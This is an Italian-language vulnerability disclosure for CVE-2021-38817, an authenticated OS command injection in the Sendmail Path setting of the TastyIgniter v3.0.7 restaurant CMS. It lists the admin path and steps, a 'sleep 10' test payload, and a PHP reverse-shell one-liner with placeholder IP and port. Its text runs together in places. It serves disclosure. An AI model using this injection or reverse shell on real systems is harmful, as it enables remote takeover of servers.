
Iniezione di comandi del sistema operativo da remoto nel campo Sendmail Path di TastyIgniter v3.0.7
Iniezione remota autenticata di comandi OS/Esecuzione di codice in remoto nella parte web Sendmail di TastyIgniter v3.0.7 (CVE-2021-38817)
Esiste una vulnerabilità di iniezione remota autenticata di comandi OS nel menu di configurazione Sendmail dell'applicazione web CMS per ristoranti TastyIgniter v3.0.7. Il parametro Sendmail Path non viene sanificato correttamente, come indicato dal comando /usr/sbin/sendmail -bs inserito nel campo, e consente di iniettare comandi arbitrari aggiungendo un punto e virgola e un comando OS aggiuntivo.
/admin/settings/edit/mail/admin/settings/edit/mailMail Protocol, seleziona SendmailSendMail Path, aggiungi un punto e virgola e un comando OS arbitrario, es. /usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; sleep 10/usr/sbin/sendmail -bs; php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'
Matt Kiely (HuskyHacks) e Mike Padrick (Fearless), agosto 2021
CVE assegnata a ottobre 2022 (lmfao)